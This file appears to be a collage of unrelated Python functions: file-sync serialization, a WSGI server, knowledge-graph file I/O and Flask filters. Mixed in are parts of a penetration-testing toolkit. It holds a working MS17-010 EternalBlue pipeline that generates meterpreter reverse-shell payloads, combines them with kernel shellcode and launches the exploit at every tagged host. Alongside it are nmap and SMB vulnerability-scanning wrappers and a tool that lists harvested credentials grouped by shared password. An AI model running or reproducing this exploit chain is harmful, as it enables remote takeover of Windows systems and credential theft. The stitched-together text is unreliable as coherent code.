if version != '1.2':
raise common.InvalidContentType('invalid file serialization version "%s"' % (version,))
root = ET.Element('File')
if self.name is not None:
ET.SubElement(root, 'name').text = self.name
# todo: do anything with "parent"?...
for attr in ('created', 'modified', 'accessed'):
if getattr(self, attr) is None:
continue
ET.SubElement(root, attr).text = common.ts_iso(getattr(self, attr))
if self.contentType is not None:
ET.SubElement(root, 'cttype').text = self.contentType
attrs = [attr
for attr in ('hidden', 'system', 'archived', 'delete', 'writable', 'readable', 'executable')
if getattr(self, attr) is not None]
if len(attrs) > 0:
xa = ET.SubElement(root, 'attributes')
for attr in attrs:
ET.SubElement(xa, attr[0]).text = 'true' if getattr(self, attr) else 'false'
if self.body is not None:
ET.SubElement(root, 'body').text = self.body
if self.body is None and self.size is not None:
ET.SubElement(root, 'size').text = str(self.size)
if len(self.extensions) > 0:
xe = ET.SubElement(root, 'Ext')
for name, values in self.extensions.items():
ET.SubElement(xe, 'XNam').text = name
for value in values:
ET.SubElement(xe, 'XVal').text = value
ET.ElementTree(root).write(stream)
return (constants.TYPE_OMADS_FILE + '+xml', '1.2') |
def load(cls, stream, contentType=None, version=None):
'''
Reverses the effects of the :meth:`dump` method, creating a FileItem
from the specified file-like `stream` object.
'''
if contentType is None:
contentType = constants.TYPE_OMADS_FILE
if ctype.getBaseType(contentType) == constants.TYPE_OMADS_FOLDER:
from .folder import FolderItem
return FolderItem.load(stream, contentType, version)
if ctype.getBaseType(contentType) != constants.TYPE_OMADS_FILE:
raise common.InvalidContentType('cannot de-serialize FileItem from "%s"' % (contentType,))
if version is None:
version = '1.2'
if version != '1.2':
raise common.InvalidContentType('invalid FileItem de-serialization version "%s"' % (version,))
ret = FileItem()
data = stream.read()
xdoc = ET.fromstring(data)
if xdoc.tag != 'File':
raise common.InvalidContent('root of application/vnd.omads-file XML must be "File" not "%s"'
% (xdoc.tag,))
ret.name = xdoc.findtext('name')
ret.body = xdoc.findtext('body')
ret.size = xdoc.findtext('size')
if ret.body is not None:
ret.size = len(ret.body)
elif ret.size is not None:
ret.size = int(ret.size)
# todo: do anything with "parent"?...
# load the date attributes
for attr in ('created', 'modified', 'accessed'):
val = xdoc.findtext(attr)
if val is not None:
setattr(ret, attr, int(common.parse_ts_iso(val)))
# load the boolean attributes
for attr in ('hidden', 'system', 'archived', 'delete',
'writable', 'readable', 'executable'):
val = xdoc.findtext('attributes/' + attr[0])
if val is not None:
setattr(ret, attr, val.lower() == 'true')
return ret |
def setup(self):
"""
This function will call msfvenom, nasm and git via subprocess to set everything up.
Returns True if everything went well, otherwise returns False.
"""
lport64 = self.port64
lport32 = self.port32
print_notification("Using ip: {}".format(self.ip))
print_notification("Generating metasploit resource file")
resource = """use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST {ip}
set LPORT {port64}
set ExitOnSession false
run -j
set payload windows/meterpreter/reverse_tcp
set LHOST {ip}
set LPORT {port32}
set ExitOnSession false
run -j
""".format(ip=self.ip, port64=lport64, port32=lport32)
self.resource_file = os.path.join(self.datadir, 'ms17_resource.rc')
with open(self.resource_file, 'w') as f:
f.write(resource)
print_success("Resource file created, run the following command in msfconsole:")
print_success("resource {}".format(self.resource_file))
command_64 = "msfvenom -p windows/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f raw -o {datadir}/payload32.bin".format(ip=self.ip, port=lport32, datadir=self.datadir)
command_32 = "msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f raw -o {datadir}/payload64.bin".format(ip=self.ip, port=lport64, datadir=self.datadir)
print_notification("Generating payloads")
process = subprocess.run(command_32.split(' '), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if process.returncode != 0:
print_error("Problem with generating payload:")
print_error(process.stderr)
return False
process = subprocess.run(command_64.split(' '), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if process.returncode != 0:
print_error("Problem with generating payload:")
print_error(process.stderr)
return False
if not os.path.exists(os.path.join(self.datadir, 'MS17-010')):
print_notification("Git repo was not found, cloning")
process = subprocess.run("git clone https://github.com/mwgielen/MS17-010 {dir}".format(dir=os.path.join(self.datadir, 'MS17-010')).split(' '))
if process.returncode != 0:
print_error("Problems with cloning git")
return False
process = subprocess.run("nasm {datadir}/MS17-010/shellcode/eternalblue_kshellcode_x64.asm -o {datadir}/kshell64.bin".format(datadir=self.datadir).split(' '))
if process.returncode != 0:
print_error("Problems with NASM")
return False
process = subprocess.run("nasm {datadir}/MS17-010/shellcode/eternalblue_kshellcode_x86.asm -o {datadir}/kshell86.bin".format(datadir=self.datadir).split(' '))
if process.returncode != 0:
print_error("Problems with NASM")
return False
self.combine_files('kshell64.bin', 'payload64.bin', 'final_met_64.bin')
self.combine_files('kshell86.bin', 'payload32.bin', 'final_met_32.bin')
self.create_payload('final_met_32.bin', 'final_met_64.bin', 'final_combined.bin')
print_notification("Combining payloads done")
print_success("Setup Done")
return True |
def create_payload(self, x86_file, x64_file, payload_file):
"""
Creates the final payload based on the x86 and x64 meterpreters.
"""
sc_x86 = open(os.path.join(self.datadir, x86_file), 'rb').read()
sc_x64 = open(os.path.join(self.datadir, x64_file), 'rb').read()
fp = open(os.path.join(self.datadir, payload_file), 'wb')
# This 5-byte stub (xor eax,eax; inc eax on x86 / REX prefix on x64; jz over
# the x86 payload) appears to act as an architecture check so that the
# matching meterpreter stage is executed.
fp.write(b'\x31\xc0\x40\x0f\x84' + pack('<I', len(sc_x86)))
fp.write(sc_x86)
fp.write(sc_x64)
fp.close() |
def combine_files(self, f1, f2, f3):
"""
Combines the files 1 and 2 into 3.
"""
with open(os.path.join(self.datadir, f3), 'wb') as new_file:
with open(os.path.join(self.datadir, f1), 'rb') as file_1:
new_file.write(file_1.read())
with open(os.path.join(self.datadir, f2), 'rb') as file_2:
new_file.write(file_2.read()) |
def detect_os(self, ip):
"""
Runs the checker.py script to detect the OS.
"""
process = subprocess.run(['python2', os.path.join(self.datadir, 'MS17-010', 'checker.py'), str(ip)], stdout=subprocess.PIPE)
out = process.stdout.decode('utf-8').split('\n')
system_os = ''
for line in out:
if line.startswith('Target OS:'):
system_os = line.replace('Target OS: ', '')
break
return system_os |
def exploit(self):
"""
Starts the exploiting phase; you should run setup before running this function.
If auto is set, this function will fire the exploit against all systems. Otherwise a curses interface is shown.
"""
search = ServiceSearch()
host_search = HostSearch()
services = search.get_services(tags=['MS17-010'])
services = [service for service in services]
if len(services) == 0:
print_error("No services found that are vulnerable for MS17-010")
return
if self.auto:
print_success("Found {} services vulnerable for MS17-010".format(len(services)))
for service in services:
print_success("Exploiting " + str(service.address))
host = host_search.id_to_object(str(service.address))
system_os = ''
if host.os:
system_os = host.os
else:
system_os = self.detect_os(str(service.address))
host.os = system_os
host.save()
text = self.exploit_single(str(service.address), system_os)
print_notification(text)
else:
service_list = []
for service in services:
host = host_search.id_to_object(str(service.address))
system_os = ''
if host.os:
system_os = host.os
else:
system_os = self.detect_os(str(service.address))
host.os = system_os
host.save()
service_list.append({'ip': service.address, 'os': system_os, 'string': "{ip} ({os}) {hostname}".format(ip=service.address, os=system_os, hostname=host.hostname)})
draw_interface(service_list, self.callback, "Exploiting {ip} with OS: {os}") |
def exploit_single(self, ip, operating_system):
"""
Exploits a single ip, exploit is based on the given operating system.
"""
result = None
if "Windows Server 2008" in operating_system or "Windows 7" in operating_system:
result = subprocess.run(['python2', os.path.join(self.datadir, 'MS17-010', 'eternalblue_exploit7.py'), str(ip), os.path.join(self.datadir, 'final_combined.bin'), "12"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
elif "Windows Server 2012" in operating_system or "Windows 10" in operating_system or "Windows 8.1" in operating_system:
result = subprocess.run(['python2', os.path.join(self.datadir, 'MS17-010', 'eternalblue_exploit8.py'), str(ip), os.path.join(self.datadir, 'final_combined.bin'), "12"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
else:
return ["System target could not be automatically identified"]
return result.stdout.decode('utf-8').split('\n') |
def epoll_poller(timeout=0.0, map=None):
"""
A poller which uses epoll(), supported on Linux 2.5.44 and newer
Borrowed from here:
https://github.com/m13253/python-asyncore-epoll/blob/master/asyncore_epoll.py#L200
"""
if map is None:
map = asyncore.socket_map
pollster = select.epoll()
if map:
for fd, obj in iteritems(map):
flags = 0
if obj.readable():
flags |= select.POLLIN | select.POLLPRI
if obj.writable():
flags |= select.POLLOUT
if flags:
# Only check for exceptions if object was either readable
# or writable.
flags |= select.POLLERR | select.POLLHUP | select.POLLNVAL
pollster.register(fd, flags)
try:
r = pollster.poll(timeout)
except select.error as err:
if err.args[0] != EINTR:
raise
r = []
for fd, flags in r:
obj = map.get(fd)
if obj is None:
continue
asyncore.readwrite(obj, flags) |
def get_poll_func():
"""Get the best available socket poll function
:return: poller function
"""
if hasattr(select, 'epoll'):
poll_func = epoll_poller
elif hasattr(select, 'poll'):
poll_func = asyncore.poll2
else:
poll_func = asyncore.poll
return poll_func |
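# Usage sketch: pick the best available poller for this platform and drive the
# asyncore socket map with it (poll_once()/serve_forever() below wrap the same idea).
import asyncore
poll = get_poll_func()
while asyncore.socket_map:
    poll(0.5) |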
def make_server(host, port, app=None,
server_class=AsyncWsgiServer,
handler_class=AsyncWsgiHandler,
ws_handler_class=None,
ws_path='/ws'):
"""Create server instance with an optional WebSocket handler
For a pure WebSocket server ``app`` may be ``None``, but an attempt to access
any path other than ``ws_path`` will cause a server error.
:param host: hostname or IP
:type host: str
:param port: server port
:type port: int
:param app: WSGI application
:param server_class: WSGI server class, defaults to AsyncWsgiServer
:param handler_class: WSGI handler class, defaults to AsyncWsgiHandler
:param ws_handler_class: WebSocket handler class, defaults to ``None``
:param ws_path: WebSocket path on the server, defaults to '/ws'
:type ws_path: str, optional
:return: initialized server instance
"""
handler_class.ws_handler_class = ws_handler_class
handler_class.ws_path = ws_path
httpd = server_class((host, port), RequestHandlerClass=handler_class)
httpd.set_app(app)
return httpd |
def poll_once(self, timeout=0.0):
"""
Poll active sockets once
This method can be used to allow aborting server polling loop
on some condition.
:param timeout: polling timeout
"""
if self._map:
self._poll_func(timeout, self._map) |
def serve_forever(self, poll_interval=0.5):
"""
Start serving HTTP requests
This method blocks the current thread.
:param poll_interval: polling timeout
:return:
"""
logger.info('Starting server on {}:{}...'.format(
self.server_name, self.server_port)
)
while True:
try:
self.poll_once(poll_interval)
except (KeyboardInterrupt, SystemExit):
break
self.handle_close()
logger.info('Server stopped.') |
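# Usage sketch (hypothetical WSGI app): build the server with make_server()
# above and block on serve_forever(); Ctrl-C breaks out of the polling loop.
def hello_app(environ, start_response):
    start_response('200 OK', [('Content-Type', 'text/plain')])
    return [b'hello']

httpd = make_server('127.0.0.1', 8000, hello_app)
httpd.serve_forever() |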
def read_labels(filename, delimiter=DEFAULT_DELIMITER):
"""read label files. Format: ent label"""
_assert_good_file(filename)
with open(filename) as f:
labels = [_label_processing(l, delimiter) for l in f]
return labels |
def write_index_translation(translation_filename, entity_ids, relation_ids):
"""write triples into a translation file."""
translation = triple_pb.Translation()
entities = []
for name, index in entity_ids.items():
translation.entities.add(element=name, index=index)
relations = []
for name, index in relation_ids.items():
translation.relations.add(element=name, index=index)
with open(translation_filename, "wb") as f:
f.write(translation.SerializeToString()) |
def write_triples(filename, triples, delimiter=DEFAULT_DELIMITER, triple_order="hrt"):
"""write triples to file."""
with open(filename, 'w') as f:
for t in triples:
line = t.serialize(delimiter, triple_order)
f.write(line + "\n") |
def read_translation(filename):
"""Returns protobuf mapcontainer. Read from translation file."""
translation = triple_pb.Translation()
with open(filename, "rb") as f:
translation.ParseFromString(f.read())
def unwrap_translation_units(units):
for u in units: yield u.element, u.index
return (list(unwrap_translation_units(translation.entities)),
list(unwrap_translation_units(translation.relations))) |
def read_openke_translation(filename, delimiter='\t', entity_first=True):
"""Returns map with entity or relations from plain text."""
result = {}
with open(filename, "r") as f:
_ = next(f) # pass the total entry number
for line in f:
line_slice = line.rstrip().split(delimiter)
if not entity_first:
line_slice = list(reversed(line_slice))
result[line_slice[0]] = line_slice[1]
return result |
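# Usage sketch (hypothetical file): OpenKE-style id files start with the entry
# count on the first line, followed by one "<name>\t<id>" entry per line.
# For such a file, the call below maps names to id strings, e.g.
# entity2id["/m/alice"] == "0".
entity2id = read_openke_translation("entity2id.txt") |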
def overview():
"""
Prints an overview of the tags of the hosts.
"""
doc = Host()
search = doc.search()
search.aggs.bucket('tag_count', 'terms', field='tags', order={'_count': 'desc'}, size=100)
response = search.execute()
print_line("{0:<25} {1}".format('Tag', 'Count'))
print_line("-" * 30)
for entry in response.aggregations.tag_count.buckets:
print_line("{0:<25} {1}".format(entry.key, entry.doc_count)) |
def main():
"""
Main credentials tool
"""
cred_search = CredentialSearch()
arg = argparse.ArgumentParser(parents=[cred_search.argparser], conflict_handler='resolve')
arg.add_argument('-c', '--count', help="Only show the number of results", action="store_true")
arguments = arg.parse_args()
if arguments.count:
print_line("Number of credentials: {}".format(cred_search.argument_count()))
else:
response = cred_search.get_credentials()
for hit in response:
print_json(hit.to_dict(include_meta=True)) |
def overview():
"""
Provides an overview of the duplicate credentials.
"""
search = Credential.search()
search.aggs.bucket('password_count', 'terms', field='secret', order={'_count': 'desc'}, size=20)\
.metric('username_count', 'cardinality', field='username') \
.metric('host_count', 'cardinality', field='host_ip') \
.metric('top_hits', 'top_hits', docvalue_fields=['username'], size=100)
response = search.execute()
print_line("{0:65} {1:5} {2:5} {3:5} {4}".format("Secret", "Count", "Hosts", "Users", "Usernames"))
print_line("-"*100)
for entry in response.aggregations.password_count.buckets:
usernames = []
for creds in entry.top_hits:
usernames.append(creds.username[0])
usernames = list(set(usernames))
print_line("{0:65} {1:5} {2:5} {3:5} {4}".format(entry.key, entry.doc_count, entry.host_count.value, entry.username_count.value, usernames)) |
def process(self, nemo):
""" Register nemo and parses annotations
.. note:: Process parses the annotations and extends information about the target URNs by retrieving resources in range
:param nemo: Nemo
"""
self.__nemo__ = nemo
for annotation in self.__annotations__:
annotation.target.expanded = frozenset(
self.__getinnerreffs__(
objectId=annotation.target.objectId,
subreference=annotation.target.subreference
)
) |
def pipe_worker(pipename, filename, object_type, query, format_string, unique=False):
"""
Starts the loop to provide the data from jackal.
"""
print_notification("[{}] Starting pipe".format(pipename))
object_type = object_type()
try:
while True:
uniq = set()
# Remove the previous file if it exists
if os.path.exists(filename):
os.remove(filename)
# Create the named pipe
os.mkfifo(filename)
# This function will block until a process opens it
with open(filename, 'w') as pipe:
print_success("[{}] Providing data".format(pipename))
# Search the database
objects = object_type.search(**query)
for obj in objects:
data = fmt.format(format_string, **obj.to_dict())
if unique:
if not data in uniq:
uniq.add(data)
pipe.write(data + '\n')
else:
pipe.write(data + '\n')
os.unlink(filename)
except KeyboardInterrupt:
print_notification("[{}] Shutting down named pipe".format(pipename))
except Exception as e:
print_error("[{}] Error: {}, stopping named pipe".format(e, pipename))
finally:
os.remove(filename) |
def create_query(section):
"""
Creates a search query based on the section of the config file.
"""
query = {}
if 'ports' in section:
query['ports'] = [section['ports']]
if 'up' in section:
query['up'] = section.getboolean('up')
if 'search' in section:
query['search'] = [section['search']]
if 'tags' in section:
query['tags'] = [section['tags']]
if 'groups' in section:
query['groups'] = [section['groups']]
return query |
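# Configuration sketch (hypothetical section): a pipe section like
#
#     [http-services]
#     type = service
#     ports = 80
#     up = true
#     tags = http
#     format = {address}:{port}
#
# would be translated by create_query() into
# {'ports': ['80'], 'up': True, 'tags': ['http']}. |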
def create_pipe_workers(configfile, directory):
"""
Creates the workers based on the given configfile to provide named pipes in the directory.
"""
type_map = {'service': ServiceSearch,
'host': HostSearch, 'range': RangeSearch,
'user': UserSearch}
config = configparser.ConfigParser()
config.read(configfile)
if not len(config.sections()):
print_error("No named pipes configured")
return
print_notification("Starting {} pipes in directory {}".format(
len(config.sections()), directory))
workers = []
for name in config.sections():
section = config[name]
query = create_query(section)
object_type = type_map[section['type']]
args = (name, os.path.join(directory, name), object_type, query,
section['format'], section.getboolean('unique', fallback=False))
workers.append(multiprocessing.Process(target=pipe_worker, args=args))
return workers |
def main():
"""
Loads the config and handles the workers.
"""
config = Config()
pipes_dir = config.get('pipes', 'directory')
pipes_config = config.get('pipes', 'config_file')
pipes_config_path = os.path.join(config.config_dir, pipes_config)
if not os.path.exists(pipes_config_path):
print_error("Please configure the named pipes first")
return
workers = create_pipe_workers(pipes_config_path, pipes_dir)
if workers:
for worker in workers:
worker.start()
try:
for worker in workers:
worker.join()
except KeyboardInterrupt:
print_notification("Shutting down")
for worker in workers:
worker.terminate()
worker.join() |
def f_i18n_iso(isocode, lang="eng"):
""" Replace isocode by its language equivalent
:param isocode: Three character long language code
:param lang: Lang in which to return the language name
:return: Full Text Language Name
"""
if lang not in flask_nemo._data.AVAILABLE_TRANSLATIONS:
lang = "eng"
try:
return flask_nemo._data.ISOCODES[isocode][lang]
except KeyError:
return "Unknown" |
def f_hierarchical_passages(reffs, citation):
""" A function to construct a hierarchical dictionary representing the different citation layers of a text
:param reffs: passage references with human-readable equivalent
:type reffs: [(str, str)]
:param citation: Main Citation
:type citation: Citation
:return: nested dictionary where keys represent the names of the levels and the final values represent the passage reference
:rtype: OrderedDict
"""
d = OrderedDict()
levels = [x for x in citation]
for cit, name in reffs:
ref = cit.split('-')[0]
levs = ['%{}|{}%'.format(levels[i].name, v) for i, v in enumerate(ref.split('.'))]
getFromDict(d, levs[:-1])[name] = cit
return d |
def f_i18n_citation_type(string, lang="eng"):
""" Take a string of form %citation_type|passage% and format it for human
:param string: String of formation %citation_type|passage%
:param lang: Language to translate to
:return: Human Readable string
.. note :: To Do : Use i18n tools and provide real i18n
"""
s = " ".join(string.strip("%").split("|"))
return s.capitalize() |
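# Usage sketch: only the first word is capitalized, so real i18n remains a
# TODO as the note above says.
f_i18n_citation_type("%book|1%")   # -> "Book 1" |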
def f_annotation_filter(annotations, type_uri, number):
""" Annotation filtering filter
:param annotations: List of annotations
:type annotations: [AnnotationResource]
:param type_uri: URI Type on which to filter
:type type_uri: str
:param number: Number of the annotation to return
:type number: int
:return: Annotation(s) matching the request
:rtype: [AnnotationResource] or AnnotationResource
"""
filtered = [
annotation
for annotation in annotations
if annotation.type_uri == type_uri
]
number = min([len(filtered), number])
if number == 0:
return None
else:
return filtered[number-1] |
def scan(self, store):
'''
Scans the local files for changes (either additions, modifications or
deletions) and reports them to the `store` object, which is expected to
implement the :class:`pysyncml.Store` interface.
'''
# steps:
# 1) generate a table of all store files, with filename,
# inode, checksum
# 2) generate a table of all current files, with filename,
# inode, checksum
# 3) iterate over all stored values and find matches, delete
# them from the "not-matched-yet" table, and record the
# change
# TODO: if this engine is running as the client, i think the best
# strategy is to delete all pending changes before starting
# the scan process. that way, any left-over gunk from a
# previous sync that did not terminate well is cleaned up...
# TODO: this algorithm, although better than the last, has the
# inconvenient downside of being very memory-hungry: it
# assumes that the entire list of notes (with sha256
# checksums - not the entire body) fits in memory. although
# it is not a ridiculous assumption (these are "notes" after
# all...), it would be nice if it did not rely on that.
# todo: by tracking inode's, this *could* also potentially reduce
# some "del/add" operations with a single "mod"
# todo: should this make use of lastmod timestamps?... that may
# help to reduce the number of checksums calculated and the
# number of entries loaded into memory...
if self.ignoreRoot is None:
self.ignoreRoot = re.compile('^(%s)$' % (re.escape(self.engine.syncSubdir),))
dbnotes = list(self.engine.model.NoteItem.q())
dbnames = dict((e.name, e) for e in dbnotes)
fsnotes = list(self._scandir('.'))
fsnames = dict((e.name, e) for e in fsnotes)
# first pass: eliminate all entries with matching filenames & checksum
for fsent in fsnames.values():
if fsent.name in dbnames and dbnames[fsent.name].sha256 == fsent.sha256:
log.debug('entry "%s" not modified', fsent.name)
# todo: update db inode and lastmod if needed...
del dbnames[fsent.name]
del fsnames[fsent.name]
# second pass: find entries that were moved to override another entry
dbskip = []
for dbent in dbnames.values():
if dbent.id in dbskip or dbent.name in fsnames:
continue
for fsent in fsnames.values():
if fsent.sha256 != dbent.sha256 or fsent.name not in dbnames:
continue
log.debug('entry "%s" deleted and replaced by "%s"', fsent.name, dbent.name)
dbother = dbnames[fsent.name]
del dbnames[dbent.name]
del dbnames[fsent.name]
del fsnames[fsent.name]
dbskip.append(dbother.id)
store.registerChange(dbent.id, pysyncml.ITEM_DELETED)
for key, val in fsent.items():
setattr(dbother, key, val)
# the digest didn't change, so this is just a filename change...
if self.engine.options.syncFilename:
store.registerChange(dbother.id, pysyncml.ITEM_MODIFIED)
break
# third pass: find entries that were renamed
dbskip = []
for dbent in dbnames.values():
if dbent.id in dbskip:
continue
for fsent in fsnames.values():
if fsent.sha256 != dbent.sha256:
continue
log.debug('entry "%s" renamed to "%s"', dbent.name, fsent.name)
del dbnames[dbent.name]
del fsnames[fsent.name]
for key, val in fsent.items():
setattr(dbent, key, val)
# the digest didn't change, so this is just a filename change...
if self.engine.options.syncFilename:
store.registerChange(dbent.id, pysyncml.ITEM_MODIFIED)
break
# fourth pass: find new and modified entries
    for fsent in list(fsnames.values()):  # snapshot, entries are removed below
if fsent.name in dbnames:
log.debug('entry "%s" modified', fsent.name)
dbent = dbnames[fsent.name]
del dbnames[fsent.name]
store.registerChange(dbent.id, pysyncml.ITEM_MODIFIED)
else:
log.debug('entry "%s" added', fsent.name)
dbent = self.engine.model.NoteItem()
self.engine.dbsession.add(dbent)
store.registerChange(dbent.id, pysyncml.ITEM_ADDED)
for key, val in fsent.items():
setattr(dbent, key, val)
del fsnames[fsent.name]
# fifth pass: find deleted entries
for dbent in dbnames.values():
store.registerChange(dbent.id, pysyncml.ITEM_DELETED)
self.engine.dbsession.add(dbent) |
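A simplified, standalone sketch of the name/checksum matching strategy the passes above implement (an illustration only, not pysyncml's actual code): entries matching on both name and checksum are unchanged, a checksum-only match is treated as a rename, a name-only match as a modification, and the leftovers as additions or deletions.

def diff_by_name_and_checksum(stored, current):
    """Compare two {name: checksum} mappings and return a list of change tuples."""
    stored, current = dict(stored), dict(current)
    changes = []
    # unchanged: same name and same checksum
    for name in [n for n in stored if n in current and stored[n] == current[n]]:
        del stored[name]
        del current[name]
    # renamed: same checksum under a different name
    for old_name, checksum in list(stored.items()):
        for new_name, new_sum in list(current.items()):
            if new_sum == checksum:
                changes.append(("renamed", old_name, new_name))
                del stored[old_name]
                del current[new_name]
                break
    # modified: same name, different checksum
    for name in [n for n in current if n in stored]:
        changes.append(("modified", name))
        del stored[name]
        del current[name]
    changes.extend(("added", name) for name in current)
    changes.extend(("deleted", name) for name in stored)
    return changes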
def check_service(service):
"""
    Connect to a service to see if it is an http or https server.
"""
# Try HTTP
service.add_tag('header_scan')
http = False
try:
result = requests.head('http://{}:{}'.format(service.address, service.port), timeout=1)
print_success("Found http service on {}:{}".format(service.address, service.port))
service.add_tag('http')
http = True
try:
service.banner = result.headers['Server']
except KeyError:
pass
except (ConnectionError, ConnectTimeout, ReadTimeout, Error):
pass
if not http:
# Try HTTPS
try:
result = requests.head('https://{}:{}'.format(service.address, service.port), verify=False, timeout=3)
service.add_tag('https')
print_success("Found https service on {}:{}".format(service.address, service.port))
try:
service.banner = result.headers['Server']
except KeyError:
pass
except (ConnectionError, ConnectTimeout, ReadTimeout, Error):
pass
service.save() |
def main():
"""
    Retrieves services and starts check_service in a gevent pool of 100.
"""
search = ServiceSearch()
services = search.get_services(up=True, tags=['!header_scan'])
print_notification("Scanning {} services".format(len(services)))
# Disable the insecure request warning
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
pool = Pool(100)
count = 0
for service in services:
count += 1
if count % 50 == 0:
print_notification("Checking {}/{} services".format(count, len(services)))
pool.spawn(check_service, service)
pool.join()
print_notification("Completed, 'http' tag added to services that respond to http, 'https' tag added to services that respond to https.") |
def import_nmap(result, tag, check_function=all_hosts, import_services=False):
"""
Imports the given nmap result.
"""
host_search = HostSearch(arguments=False)
service_search = ServiceSearch()
parser = NmapParser()
report = parser.parse_fromstring(result)
imported_hosts = 0
imported_services = 0
for nmap_host in report.hosts:
if check_function(nmap_host):
imported_hosts += 1
host = host_search.id_to_object(nmap_host.address)
host.status = nmap_host.status
host.add_tag(tag)
if nmap_host.os_fingerprinted:
host.os = nmap_host.os_fingerprint
if nmap_host.hostnames:
host.hostname.extend(nmap_host.hostnames)
if import_services:
for service in nmap_host.services:
imported_services += 1
serv = Service(**service.get_dict())
serv.address = nmap_host.address
service_id = service_search.object_to_id(serv)
if service_id:
# Existing object, save the banner and script results.
serv_old = Service.get(service_id)
if service.banner:
serv_old.banner = service.banner
# TODO implement
# if service.script_results:
# serv_old.script_results.extend(service.script_results)
serv_old.save()
else:
# New object
serv.address = nmap_host.address
serv.save()
if service.state == 'open':
host.open_ports.append(service.port)
if service.state == 'closed':
host.closed_ports.append(service.port)
if service.state == 'filtered':
host.filtered_ports.append(service.port)
host.save()
if imported_hosts:
print_success("Imported {} hosts, with tag {}".format(imported_hosts, tag))
else:
print_error("No hosts found")
return {'hosts': imported_hosts, 'services': imported_services} |
def nmap(nmap_args, ips):
"""
Start an nmap process with the given args on the given ips.
"""
config = Config()
arguments = ['nmap', '-Pn']
arguments.extend(ips)
arguments.extend(nmap_args)
output_file = ''
now = datetime.datetime.now()
    if '-oA' not in nmap_args:
output_name = 'nmap_jackal_{}'.format(now.strftime("%Y-%m-%d %H:%M"))
path_name = os.path.join(config.get('nmap', 'directory'), output_name)
print_notification("Writing output of nmap to {}".format(path_name))
if not os.path.exists(config.get('nmap', 'directory')):
os.makedirs(config.get('nmap', 'directory'))
output_file = path_name + '.xml'
arguments.extend(['-oA', path_name])
else:
output_file = nmap_args[nmap_args.index('-oA') + 1] + '.xml'
print_notification("Starting nmap")
subprocess.call(arguments)
with open(output_file, 'r') as f:
return f.read() |
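A hypothetical invocation of the wrapper above; the target range and output prefix are made up, and the nmap binary must be installed for the subprocess call to succeed.

xml_report = nmap(['--top-ports', '10', '-oA', '/tmp/jackal_example'], ['192.0.2.0/24'])
print("{} bytes of nmap XML".format(len(xml_report)))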
def nmap_discover():
"""
    Retrieves ranges from jackal and runs one of two nmap modes on them to find hosts:
ping: icmp / arp pinging of targets
lookup: reverse dns lookup
"""
rs = RangeSearch()
rs_parser = rs.argparser
arg = argparse.ArgumentParser(parents=[rs_parser], conflict_handler='resolve')
arg.add_argument('type', metavar='type', \
help='The type of nmap scan to do, choose from ping or lookup', \
type=str, choices=['ping', 'lookup'])
arguments, nmap_args = arg.parse_known_args()
tag = None
if arguments.type == 'ping':
tag = 'nmap_ping'
nmap_args.append('-sn')
nmap_args.append('-n')
check_function = include_up_hosts
elif arguments.type == 'lookup':
tag = 'nmap_lookup'
nmap_args.append('-sL')
check_function = include_hostnames
ranges = rs.get_ranges(tags=['!{}'.format(tag)])
ranges = [r for r in ranges]
ips = []
for r in ranges:
ips.append(r.range)
print_notification("Running nmap with args: {} on {} range(s)".format(nmap_args, len(ips)))
result = nmap(nmap_args, ips)
stats = import_nmap(result, tag, check_function)
stats['scanned_ranges'] = len(ips)
Logger().log('nmap_discover', "Nmap discover with args: {} on {} range(s)".format(nmap_args, len(ips)), stats)
for r in ranges:
r.add_tag(tag)
r.save() |
def nmap_scan():
"""
Scans the given hosts with nmap.
"""
# Create the search and config objects
hs = HostSearch()
config = Config()
    # Map the user-supplied scan type to the corresponding nmap port-selection options.
nmap_types = ['top10', 'top100', 'custom', 'top1000', 'all']
options = {'top10':'--top-ports 10', 'top100':'--top-ports 100', 'custom': config.get('nmap', 'options'), 'top1000': '--top-ports 1000', 'all': '-p-'}
# Create an argument parser
hs_parser = hs.argparser
argparser = argparse.ArgumentParser(parents=[hs_parser], conflict_handler='resolve', \
description="Scans hosts from the database using nmap, any arguments that are not in the help are passed to nmap")
argparser.add_argument('type', metavar='type', \
help='The number of ports to scan: top10, top100, custom, top1000 (default) or all', \
type=str, choices=nmap_types, default='top1000', const='top1000', nargs='?')
arguments, extra_nmap_args = argparser.parse_known_args()
# Fix the tags for the search
tags = nmap_types[nmap_types.index(arguments.type):]
tags = ["!nmap_" + tag for tag in tags]
hosts = hs.get_hosts(tags=tags)
hosts = [host for host in hosts]
# Create the nmap arguments
nmap_args = []
nmap_args.extend(extra_nmap_args)
nmap_args.extend(options[arguments.type].split(' '))
# Run nmap
print_notification("Running nmap with args: {} on {} hosts(s)".format(nmap_args, len(hosts)))
if len(hosts):
result = nmap(nmap_args, [str(h.address) for h in hosts])
# Import the nmap result
for host in hosts:
host.add_tag("nmap_{}".format(arguments.type))
host.save()
print_notification("Nmap done, importing results")
stats = import_nmap(result, "nmap_{}".format(arguments.type), check_function=all_hosts, import_services=True)
stats['scanned_hosts'] = len(hosts)
stats['type'] = arguments.type
Logger().log('nmap_scan', "Performed nmap {} scan on {} hosts".format(arguments.type, len(hosts)), stats)
else:
print_notification("No hosts found") |
def nmap_smb_vulnscan():
"""
Scans available smb services in the database for smb signing and ms17-010.
"""
service_search = ServiceSearch()
services = service_search.get_services(ports=['445'], tags=['!smb_vulnscan'], up=True)
services = [service for service in services]
service_dict = {}
for service in services:
service.add_tag('smb_vulnscan')
service_dict[str(service.address)] = service
nmap_args = "-Pn -n --disable-arp-ping --script smb-security-mode.nse,smb-vuln-ms17-010.nse -p 445".split(" ")
if services:
result = nmap(nmap_args, [str(s.address) for s in services])
parser = NmapParser()
report = parser.parse_fromstring(result)
smb_signing = 0
ms17 = 0
for nmap_host in report.hosts:
for script_result in nmap_host.scripts_results:
script_result = script_result.get('elements', {})
service = service_dict[str(nmap_host.address)]
if script_result.get('message_signing', '') == 'disabled':
print_success("({}) SMB Signing disabled".format(nmap_host.address))
service.add_tag('smb_signing_disabled')
smb_signing += 1
if script_result.get('CVE-2017-0143', {}).get('state', '') == 'VULNERABLE':
print_success("({}) Vulnerable for MS17-010".format(nmap_host.address))
service.add_tag('MS17-010')
ms17 += 1
service.update(tags=service.tags)
